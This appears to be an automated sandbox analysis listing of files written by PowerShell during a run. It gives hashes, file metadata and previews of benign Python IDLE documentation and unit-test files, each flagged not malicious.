                                                                                                    SHA1:B47040CF799FFB7AEDAC3E52A32A9F14F4E40DC2
                                                                                                    SHA-256:DCD6421AE86C6A0B52BDF28F94582E2C20829F230E8D8E0E3F4B59C8D0E269ED
                                                                                                    SHA-512:9BEDEE704A004A67C6735E59C0DBC75BFB258D1A58B3AB563649B7EF8668937937EFB96EB982E7B3A778D21E87706658A543EAA317BACCFFD44C4A662116C04C
                                                                                                    Malicious:false
                                                                                                    Preview:README.txt: an index to idlelib files and the IDLE menu.....IDLE is Python's Integrated Development and Learning..Environment. The user documentation is part of the Library Reference and..is available in IDLE by selecting Help => IDLE Help. This README documents..idlelib for IDLE developers and curious users.....IDLELIB FILES lists files alphabetically by category,..with a short description of each.....IDLE MENU show the menu tree, annotated with the module..or module object that implements the corresponding function.....This file is descriptive, not prescriptive, and may have errors..and omissions and lag behind changes in idlelib.......IDLELIB FILES..=============....Implementation files not in IDLE MENU are marked (nim).....Startup..-------..__init__.py # import, does nothing..__main__.py # -m, starts IDLE..idle.bat..idle.py..idle.pyw....Implementation..--------------..autocomplete.py # Complete attribute names or filenames...autocomplete_w.py # Display completions...autoexpan
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8688
                                                                                                    Entropy (8bit):4.794943088949754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:NexsLifxJrg/vPnX6QddAWX9hghNAmgKu3czK3r69+n926zJakV+QQDoYkE7DgXM:NSy0D236+YGKEr69O9rai+IEGtVLhC
                                                                                                    MD5:06B386CBB4614358099B3741402557CB
                                                                                                    SHA1:3E5423A8006FE9B80F934CBA3448D42D0573398B
                                                                                                    SHA-256:1887D7DF719819D8FE151B28B4B0555EA6E512F7A22DB5A113E633386C1538CB
                                                                                                    SHA-512:3A544B99B9DC88EF161C3C0ED65B15742C761007EF9A753451CE045A00573DA6D68F718CE58949FEBC4C792547D244EAEA762AD70DF87EC61BFE73F5E08A7477
                                                                                                    Malicious:false
                                                                                                    Preview:Original IDLE todo, much of it now outdated:..============================================..TO DO:....- improve debugger:.. - manage breakpoints globally, allow bp deletion, tbreak, cbreak etc... - real object browser.. - help on how to use it (a simple help button will do wonders).. - performance? (updates of large sets of locals are slow).. - better integration of "debug module".. - debugger should be global resource (attached to flist, not to shell).. - fix the stupid bug where you need to step twice.. - display class name in stack viewer entries for methods.. - suppress tracing through IDLE internals (e.g. print) DONE.. - add a button to suppress through a specific module or class or method.. - more object inspection to stack viewer, e.g. to view all array items..- insert the initial current directory into sys.path DONE..- default directory attribute for each window instead of only for windows.. that have an associated filename..- command expansio
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1001
                                                                                                    Entropy (8bit):4.829180974277778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:buQMUh+SNrxFk5hCDineFNYFML9crQL9ral:buQMA+SpxFkKDineF+F2hral
                                                                                                    MD5:E6B0DE5BAAA60FE0B0A476241E71072B
                                                                                                    SHA1:335309BEC933E70D338262AEBDAA0F661CC25BB5
                                                                                                    SHA-256:0EB3B8E1D20E47F63ED327AEEEDA491D2FFB41777A9108FEEE158AA445790A5F
                                                                                                    SHA-512:00AEF2423DCAB1BBDCFC469DDB5663FE83324C8FB2FD6D4DA467514361CEE6767CAA6C8F67D7691ADCF225C2E946320B806CD5B054C3C7963DCF7032E4CF0235
                                                                                                    Malicious:false
                                                                                                    Preview:"Test debugger_r, coverage 30%."....from idlelib import debugger_r..import unittest....# Boilerplate likely to be needed for future test classes...##from test.support import requires..##from tkinter import Tk..##class Test(unittest.TestCase):..## @classmethod..## def setUpClass(cls):..## requires('gui')..## cls.root = Tk()..## @classmethod..## def tearDownClass(cls):..## cls.root.destroy()....# GUIProxy, IdbAdapter, FrameProxy, CodeProxy, DictProxy,..# GUIAdapter, IdbProxy, and 7 functions still need tests.....class IdbAdapterTest(unittest.TestCase):.... def test_dict_item_noattr(self): # Issue 33065..... class BinData:.. def __repr__(self):.. return self.length.... debugger_r.dicttable[0] = {'BinData': BinData()}.. idb = debugger_r.IdbAdapter(None).. self.assertTrue(idb.dict_item(0, 'BinData')).. debugger_r.dicttable.clear()......if __name__ == '__main__':.. unittest.main(verbosity=2).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1668
                                                                                                    Entropy (8bit):4.746775131615608
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:bubhTquItgn/EUTjCZGymKA1Klqhnpr346mKAE46lqepr3KAhjepO5ChnpWYcjJu:bubMQ/Nhy/lUpbPvCY8pW7wpWk4al
                                                                                                    MD5:6D3E4601B043C94FA7AC1A3462C39095
                                                                                                    SHA1:1714A4FD9301233E57A37E11D81A52A43980DADB
                                                                                                    SHA-256:A3A5CEEC69CE1794649B088AC861183B8ADC4C91881B29FBB221CEA1089B71CA
                                                                                                    SHA-512:6390DBCFEB0F3D8D5FA2E9170D51C4EF2132FB55EDBAF65D3D6A29CC7EEA0C6713D134441BDC66EE8A59BDA56EF01A22F5AF291539961B265BA287CB6387DA96
                                                                                                    Malicious:false
                                                                                                    Preview:"Test debugobj, coverage 40%."....from idlelib import debugobj..import unittest......class ObjectTreeItemTest(unittest.TestCase):.... def test_init(self):.. ti = debugobj.ObjectTreeItem('label', 22).. self.assertEqual(ti.labeltext, 'label').. self.assertEqual(ti.object, 22).. self.assertEqual(ti.setfunction, None)......class ClassTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.ClassTreeItem('label', 0).. self.assertTrue(ti.IsExpandable())......class AtomicObjectTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.AtomicObjectTreeItem('label', 0).. self.assertFalse(ti.IsExpandable())......class SequenceTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.SequenceTreeItem('label', ()).. self.assertFalse(ti.IsExpandable()).. ti = debugobj.SequenceTreeItem('label', (1,)).. self.assertTrue(ti.IsExpandable(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):567
                                                                                                    Entropy (8bit):4.794565771192221
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:buF7GJvShTqFAqyJBVeyiO9BhBFnIVmkSpf6BHevy02aLJv:buBgvSMJw6wBhbQ/eoal
                                                                                                    MD5:E95B514D3E356580A9DED30409B9DF72
                                                                                                    SHA1:0060FA6A750D9220EA3BA8A6ADFCC8EB6AE39622
                                                                                                    SHA-256:264859E8DEFF2F9CF3F81045142A09D3BF925F350DD48DB5BA69368FAF2F29F3
                                                                                                    SHA-512:72D6EB5977125A88BC04E8D4E5070D028002E2FAD16F64324EDF4E6AF5296701A1395F4EE48D5B00B72AA3A77C143D6E61A14689A5EB8AC2DAF5A83D03031E26
                                                                                                    Malicious:false
                                                                                                    Preview:"Test debugobj_r, coverage 56%."....from idlelib import debugobj_r..import unittest......class WrappedObjectTreeItemTest(unittest.TestCase):.... def test_getattr(self):.. ti = debugobj_r.WrappedObjectTreeItem(list).. self.assertEqual(ti.append, list.append)....class StubObjectTreeItemTest(unittest.TestCase):.... def test_init(self):.. ti = debugobj_r.StubObjectTreeItem('socket', 1111).. self.assertEqual(ti.sockio, 'socket').. self.assertEqual(ti.oid, 1111)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1611
                                                                                                    Entropy (8bit):4.558968618831017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:bwjHRXi4D53ae2WXVRtORONMlPqZ1OajZXRai:c7E4D5NvRER2i6Rjrf
                                                                                                    MD5:1A0F7B379699E69B58D8DFD066D6F20C
                                                                                                    SHA1:D3F9FAC02FFCD5900EE2F832C0A97B1409932102
                                                                                                    SHA-256:2ACBE98D9DB036BAA7DCD46AC24B5832CF6B716C588C267365558BADA2166387
                                                                                                    SHA-512:47F84F0AF947D8E05932C5FD293ADD0F3B88EFD10E722BCF10380F84626DFE7717DEC24F0BA6D8A590CDE9F64A517BC8165BF328EF60D0ECD4B4B78E774164D8
                                                                                                    Malicious:false
                                                                                                    Preview:"Test delegator, coverage 100%."....from idlelib.delegator import Delegator..import unittest......class DelegatorTest(unittest.TestCase):.... def test_mydel(self):.. # Test a simple use scenario..... # Initialize an int delegator... mydel = Delegator(int).. self.assertIs(mydel.delegate, int).. self.assertEqual(mydel._Delegator__cache, set()).. # Trying to access a non-attribute of int fails... self.assertRaises(AttributeError, mydel.__getattr__, 'xyz').... # Add real int attribute 'bit_length' by accessing it... bl = mydel.bit_length.. self.assertIs(bl, int.bit_length).. self.assertIs(mydel.__dict__['bit_length'], int.bit_length).. self.assertEqual(mydel._Delegator__cache, {'bit_length'}).... # Add attribute 'numerator'... mydel.numerator.. self.assertEqual(mydel._Delegator__cache, {'bit_length', 'numerator'}).... # Delete 'numerator'... del mydel.numerator..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2638
                                                                                                    Entropy (8bit):4.38825059079587
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sFbnrbj960NEjItz/KpIynMXlzRVmCh3Spsro8EHH3T1esSqX84KK41es0pAzal:sFTrf9pNEjk/KpjeT3BKhdSA8HKWNfal
                                                                                                    MD5:75AFF43E9E27B04038969E0FEB810E38
                                                                                                    SHA1:11208F7E174D740012674DFD8DCD60548EAF5C62
                                                                                                    SHA-256:93F790D07D34F2C80378D37BEED57FA25BB250F5812B497D34E788105EDC57AA
                                                                                                    SHA-512:622D34268F39700D444EAB4FF3CA7426996D62443CFA7E8626309B73BC52EC9F9BBD73DB5BF9EA068923C617D9EF0BEA99CF300E3210C85B62971002EA2013FA
                                                                                                    Malicious:false
                                                                                                    Preview:'''Test (selected) IDLE Edit menu items.....Edit modules have their own test files..'''..from test.support import requires..requires('gui')..import tkinter as tk..from tkinter import ttk..import unittest..from idlelib import pyshell....class PasteTest(unittest.TestCase):.. '''Test pasting into widgets that allow pasting..... On X11, replacing selections requires tk fix... '''.. @classmethod.. def setUpClass(cls):.. cls.root = root = tk.Tk().. cls.root.withdraw().. pyshell.fix_x11_paste(root).. cls.text = tk.Text(root).. cls.entry = tk.Entry(root).. cls.tentry = ttk.Entry(root).. cls.spin = tk.Spinbox(root).. root.clipboard_clear().. root.clipboard_append('two').... @classmethod.. def tearDownClass(cls):.. del cls.text, cls.entry, cls.tentry.. cls.root.clipboard_clear().. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_paste_text(self):..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8392
                                                                                                    Entropy (8bit):4.081502616156668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zJFDrIHffnxR+wL6hNM6oJ3bSKwxCYTsJmFDCkmcFcCkm9M9MSij2fO2NcvIEIcs:tl2ffxBci7FGxQiGcFyYCNcpSx9ak
                                                                                                    MD5:8F93FDCC0A24FE209828CEC159C0813A
                                                                                                    SHA1:CF684F3240492C8F694287AB6FE310C7280ADAE5
                                                                                                    SHA-256:FACC3C65F65E56D35F261A6829E525A52AED087047987F4755090A0A110A603B
                                                                                                    SHA-512:FEAB18C7AB8AFF7B0AACD893C427BA41555CB2DB55AEAD375834F363CB53A762F45A5FB666822B39D2C569263D3A41736814346B9F1432894C33DF10C72F153D
                                                                                                    Malicious:false
                                                                                                    Preview:"Test editor, coverage 53%."....from idlelib import editor..import unittest..from collections import namedtuple..from test.support import requires..from tkinter import Tk, Text....Editor = editor.EditorWindow......class EditorWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id).. cls.root.destroy().. del cls.root.... def test_init(self):.. e = Editor(root=self.root).. self.assertEqual(e.root, self.root).. e._close()......class GetLineIndentTest(unittest.TestCase):.. def test_empty_lines(self):.. for tabwidth in [1, 2, 4, 6, 8]:.. for line in ['', '\n']:.. with self.subTest(line=line, tabwidth=tabwidth):.. self.assertE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):828
                                                                                                    Entropy (8bit):4.516635460102882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:OhT6TRpHoRjrzNpqj7ze4XjrRkea2NZH51HGlDYj9jxbcMNbRLoDZ02aLJv:OurI07zlHRg2f51mn++jal
                                                                                                    MD5:91C65697FD96A05EAC03EB1F52E1D0D2
                                                                                                    SHA1:800A0F93EDB98C55265D435F6BF02CF850C98B56
                                                                                                    SHA-256:9E8240FD5B08F2CF3D5DC16E39AC19F23737FB401CCB461FBBCC99BF0F481BEB
                                                                                                    SHA-512:06D48052CEFC3446FACCE5961EEF77783778A4D01917FD320035C7C997B04D646272600C0A9DEE0C1121E6EE5449A00880F5F97CFA53711AC126B233A99DAD29
                                                                                                    Malicious:false
                                                                                                    Preview:"Test filelist, coverage 19%."....from idlelib import filelist..import unittest..from test.support import requires..from tkinter import Tk....class FileListTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id).. cls.root.destroy().. del cls.root.... def test_new_empty(self):.. flist = filelist.FileList(self.root).. self.assertEqual(flist.root, self.root).. e = flist.new().. self.assertEqual(type(e), flist.EditorWindow).. e._close()......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24278
                                                                                                    Entropy (8bit):4.588852559744101
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:JH243Wuosx7j9ujP74hOsSrRqT3TSKNTjHq2IdFuMRp43jrV4:JH2UWrsx7Zuo0B4DSKBjHOdFuMRp43j2
                                                                                                    MD5:4E36B5972CCD0230BD4287E81C933DBB
                                                                                                    SHA1:5CA83469BF4CED4769348331D1F5546D2E6BC623
                                                                                                    SHA-256:80A2E9DFC0E7CB896B1E9BD61ABE68C6B15F74C7349E393C3AA1EB05A363651F
                                                                                                    SHA-512:6ABA699EAF3A59DE25EF333573BB9DF0B38886714F57F331266BE01F17A6CC2C6345C7D4BFA312B3FC5A20D05CC73A5CCDD8AC1BEAF13ED28A91785C59E8CE74
                                                                                                    Malicious:false
                                                                                                    Preview:"Test format, coverage 99%."....from idlelib import format as ft..import unittest..from unittest import mock..from test.support import requires..from tkinter import Tk, Text..from idlelib.editor import EditorWindow..from idlelib.idle_test.mock_idle import Editor as MockEditor......class Is_Get_Test(unittest.TestCase):.. """Test the is_ and get_ functions""".. test_comment = '# This is a comment'.. test_nocomment = 'This is not a comment'.. trailingws_comment = '# This is a comment '.. leadingws_comment = ' # This is a comment'.. leadingws_nocomment = ' This is not a comment'.... def test_is_all_white(self):.. self.assertTrue(ft.is_all_white('')).. self.assertTrue(ft.is_all_white('\t\n\r\f\v')).. self.assertFalse(ft.is_all_white(self.test_comment)).... def test_get_indent(self):.. Equal = self.assertEqual.. Equal(ft.get_indent(self.test_comment), '').. Equal(ft.get_indent(self.trailingws_comment), '').. Equ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5228
                                                                                                    Entropy (8bit):4.591850080243058
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5W7MrCo7i8crctdMJqlYiqsLBs+cqhjtdcQBtuZsnJk/k:tv7i8creisBvPhhdcQBgsnwk
                                                                                                    MD5:A1EC3E90E28CBABED4D204A75D9C8ABA
                                                                                                    SHA1:42C4CDD9BCFF7AED65C58317FEC121DE465F7D57
                                                                                                    SHA-256:18441B4F0F2095FBA843EEC48293D5ADC8D62F30A6BE843D1B37F784070ACCC0
                                                                                                    SHA-512:B04583FE4BEFD843C7C1EE51D2E0E1AC953FA7D06B51CC632EA0BC77E5C8897BFDFF82F02B6C8E54F0C39CD243F4676BC852FCE94C7C65FBB187325B9FBE5BBB
                                                                                                    Malicious:false
                                                                                                    Preview:""" !Changing this line will break Test_findfile.test_found!..Non-gui unit tests for grep.GrepDialog methods...dummy_command calls grep_it calls findfiles...An exception raised in one method will fail callers...Otherwise, tests are mostly independent...Currently only test grep_it, coverage 51%..."""..from idlelib import grep..import unittest..from test.support import captured_stdout..from idlelib.idle_test.mock_tk import Var..import os..import re......class Dummy_searchengine:.. '''GrepDialog.__init__ calls parent SearchDiabolBase which attaches the.. passed in SearchEngine instance as attribute 'engine'. Only a few of the.. many possible self.engine.x attributes are needed here... '''.. def getpat(self):.. return self._pat....searchengine = Dummy_searchengine()......class Dummy_grep:.. # Methods tested.. #default_command = GrepDialog.default_command.. grep_it = grep.GrepDialog.grep_it.. # Other stuff needed.. recvar = Var(False).. engine = searc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):899
                                                                                                    Entropy (8bit):4.682997045608694
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:XcJhT86rRpH7CkLeQiuRjrzGpjQC79arSNqJ84Xj4mRVHGSPyWyTn4oQzK02aLJv:yNrrbjLeHuQEm6vMmRVmrWy/8Yal
                                                                                                    MD5:2EC562890FEC5BB4A7C2270679F0FD8E
                                                                                                    SHA1:7CE03B4B43ABCDDBEB849D92EFE90ECCC2535134
                                                                                                    SHA-256:DECABF0433C50B63C75FE01CF5FC690C59DFBFDBCACF4A9D6411D90C8D57061F
                                                                                                    SHA-512:9D1300A25DA6F733F010ABF405F513123AFA362F3EEBD9913C817A1F8DCB13A1801E9B122784C472147D49E8091390689D67812549E2F3ADD4A470327D9222EB
                                                                                                    Malicious:false
                                                                                                    Preview:"Test help, coverage 94%."....from idlelib import help..import unittest..from test.support import requires..requires('gui')..from os.path import abspath, dirname, join..from tkinter import Tk......class IdleDocTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. "By itself, this tests that file parsed without exception.".. cls.root = root = Tk().. root.withdraw().. cls.window = help.show_idlehelp(root).... @classmethod.. def tearDownClass(cls):.. del cls.window.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_1window(self):.. self.assertIn('IDLE Doc', self.window.wm_title()).... def test_4text(self):.. text = self.window.frame.text.. self.assertEqual(text.get('1.0', '1.end'), ' IDLE ')......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6086
                                                                                                    Entropy (8bit):4.55696386160225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:J7rlIC4hu+xQ7l2x2Ju+vJK+RqjP+kQZc+xQav4slNg/KzftFTthFk:l2yp2x2JlJfRqjGZZnyav4slNg/KLtFa
                                                                                                    MD5:C323A6F1EF88CC944481662B15B3316D
                                                                                                    SHA1:C1E521966C6B6A7E8C323BA88EB6C7EE5286C90A
                                                                                                    SHA-256:7E528FA30564A319C9524E13F18BF8E08115888C0E1B182096C9E1D0DCE49CDD
                                                                                                    SHA-512:EAB5A0FCF5FD26D52EB28DD1C1268193E332A5F2D13A958EAB40696F95EDB9B7B125EBE7452C5566982D729C761F233197B53B4ECD90AF917472C2206042B8FE
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test help_about, coverage 100%...help_about.build_bits branches on sys.platform='darwin'...'100% combines coverage on Mac and others..."""....from idlelib import help_about..import unittest..from test.support import requires, findfile..from tkinter import Tk, TclError..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Mbox_func..from idlelib import textview..import os.path..from platform import python_version....About = help_about.AboutDialog......class LiveDialogTest(unittest.TestCase):.. """Simulate user clicking buttons other than [Close]..... Test that invoked textview has text from source... """.. @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.dialog = About(cls.root, 'About IDLE', _utest=True).... @classmethod.. def tearDownClass(cls):.. del cls.dialog.. cls.root.update_idletasks().. cls.root.destroy().. del cls.roo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5689
                                                                                                    Entropy (8bit):4.567228448118011
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JMrVrn2q8dncVlzSW6icywXGCyCsC3f/wgj32b+eaK2Enf:w0qJvz8hywd5/wgr2Ke6Enf
                                                                                                    MD5:E0E7DEBE6E58F6AC0A93B3F077B57911
                                                                                                    SHA1:A2AE702EEAE60969FC2D2A062C1961E5527C6A1B
                                                                                                    SHA-256:CAC6C984CE34456D4AEFFF5721B8D4C6FBE76286BFBBEF8DDACF61D5D36071B7
                                                                                                    SHA-512:B70D9577723770CE25444410CAF850AD1883B3D5E8C5190F48973DA49611C87EAFBEFF42F0B58E012D9DD28251FFF152A15220BF445A61EAC12EE2ACFFA5F0F3
                                                                                                    Malicious:false
                                                                                                    Preview:" Test history, coverage 100%."....from idlelib.history import History..import unittest..from test.support import requires....import tkinter as tk..from tkinter import Text as tkText..from idlelib.idle_test.mock_tk import Text as mkText..from idlelib.config import idleConf....line1 = 'a = 7'..line2 = 'b = a'......class StoreTest(unittest.TestCase):.. '''Tests History.__init__ and History.store with mock Text'''.... @classmethod.. def setUpClass(cls):.. cls.text = mkText().. cls.history = History(cls.text).... def tearDown(self):.. self.text.delete('1.0', 'end').. self.history.history = [].... def test_init(self):.. self.assertIs(self.history.text, self.text).. self.assertEqual(self.history.history, []).. self.assertIsNone(self.history.prefix).. self.assertIsNone(self.history.pointer).. self.assertEqual(self.history.cyclic,.. idleConf.GetOption("main", "History", "cyclic", 1, "bool")).... de
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9358
                                                                                                    Entropy (8bit):4.580916372746426
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+mrI0JOltNzx1MG9OcInDjbkscMjsk9ej0/+k2tRMpkm/7eqz92aO2k:nI7NVOTnDjbklMjvwj0/FOq/78V2k
                                                                                                    MD5:A0175297E64A1D8BC5B68461F6A8BA74
                                                                                                    SHA1:8B50F7A754DED3B9836DDB552728D39902E99A9E
                                                                                                    SHA-256:166421C087BDACE4BBF6CB1FD8B8BBA986B0DFB485762521C9A7AE5618EDC166
                                                                                                    SHA-512:1138DD122E3D3C9096710608756CB4F493E8D107AF8DA372EC3BB5FB37DAA81D6F562106882309BEEDC316CBF01B95F1CB887C5D2835D72C2ACF19E55136554F
                                                                                                    Malicious:false
                                                                                                    Preview:"Test hyperparser, coverage 98%."....from idlelib.hyperparser import HyperParser..import unittest..from test.support import requires..from tkinter import Tk, Text..from idlelib.editor import EditorWindow....class DummyEditwin:.. def __init__(self, text):.. self.text = text.. self.indentwidth = 8.. self.tabwidth = 8.. self.prompt_last_line = '>>>'.. self.num_context_lines = 50, 500, 1000.... _build_char_in_string_func = EditorWindow._build_char_in_string_func.. is_char_in_string = EditorWindow.is_char_in_string......class HyperParserTest(unittest.TestCase):.. code = (.. '"""This is a module docstring"""\n'.. '# this line is a comment\n'.. 'x = "this is a string"\n'.. "y = 'this is also a string'\n".. 'l = [i for i in range(10)]\n'.. 'm = [py*py for # comment\n'.. ' py in l]\n'.. 'x.__len__\n'.. "z = ((r'asdf')+('a')))\n".. '[x
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2541
                                                                                                    Entropy (8bit):4.57390880549985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:q1lrIXJYhp4cgMfhQXMBBodwxtbHmoRCsqQB4eRND5zvtR4O1al:q1lrIXJmp4cvfhQddwxF/4zuNDJtG2k
                                                                                                    MD5:E3653EDDA57FF76A040338D328D61ED4
                                                                                                    SHA1:57B1579C715F9F2ED7BB1EF53963890BE48F6694
                                                                                                    SHA-256:14C80A566031A8AED6A781755BD6D8BD6B08F5200C16A8495EA4CCD55121EF0C
                                                                                                    SHA-512:CA9F69AB812853292E7CDE16751CAC1D1E26AFE4C1958840100D4C24D60760B90244FC202A9A098C569EAE1D4C323778346B12C21ABE2AD501E9131F99588186
                                                                                                    Malicious:false
                                                                                                    Preview:"Test , coverage 17%."....from idlelib import iomenu..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow..from idlelib import util..from idlelib.idle_test.mock_idle import Func....# Fail if either tokenize.open and t.detect_encoding does not exist...# These are used in loadfile and encode...# Also used in pyshell.MI.execfile and runscript.tabnanny...from tokenize import open, detect_encoding..# Remove when we have proper tests that use both.......class IOBindingTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.editwin = EditorWindow(root=cls.root).. cls.io = iomenu.IOBinding(cls.editwin).... @classmethod.. def tearDownClass(cls):.. cls.io.close().. cls.editwin._close().. del cls.editwin.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3557
                                                                                                    Entropy (8bit):4.497249719970759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ed1rgtFgplN6Yd1qBxsM9cTHjlvAD/NDHeVRk:EPfLN6YTqBiM9cTHJvAD/NDHeXk
                                                                                                    MD5:BF484DD8323544B5D452993F81273C79
                                                                                                    SHA1:47C053467A099C0456EE238F2EA1FD73F2EFF067
                                                                                                    SHA-256:6FBEE21ADEF8F95F9BE575F6058322D66A66775924AE594F0D9FA2E98D8D688F
                                                                                                    SHA-512:BE154040BF0AE7F076C2B04D4C509DBEFCAEEA784996F31119308B421D79E7481C9935CF538C84C66111381BAFC0EFCF88931FE058D689A45AACECF831135424
                                                                                                    Malicious:false
                                                                                                    Preview:"Test macosx, coverage 45% on Windows."....from idlelib import macosx..import unittest..from test.support import requires..import tkinter as tk..import unittest.mock as mock..from idlelib.filelist import FileList....mactypes = {'carbon', 'cocoa', 'xquartz'}..nontypes = {'other'}..alltypes = mactypes | nontypes......def setUpModule():.. global orig_tktype.. orig_tktype = macosx._tk_type......def tearDownModule():.. macosx._tk_type = orig_tktype......class InitTktypeTest(unittest.TestCase):.. "Test _init_tk_type.".... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = tk.Tk().. cls.root.withdraw().. cls.orig_platform = macosx.platform.... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.. macosx.platform = cls.orig_platform.... def test_init_sets_tktype(self):.. "Test that _init_tk_type sets _tk_type according to platform."..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1680
                                                                                                    Entropy (8bit):4.379173964804139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:irPDqqy6Hcrib8swg0pG0IfyIrFHkRgal:irPDqqDH5bXwg000IKIhHkgal
                                                                                                    MD5:B117A570858CB6C08AD7D14D5C25F605
                                                                                                    SHA1:9F6FAE2C3504E1E428C127E3C458605614AF946F
                                                                                                    SHA-256:E3C6BFCCC93C9C0469BB6EAD80EE552699871AB85ECFD3002241DAE936CA7BB6
                                                                                                    SHA-512:B500B7D22E84376FEC28AB7E7C4AAB714BBE6F026968A110382151CAC94924A65D1736679401A970204A1A3600E41B15F287CF95B5476534204F5738F65E7EB8
                                                                                                    Malicious:false
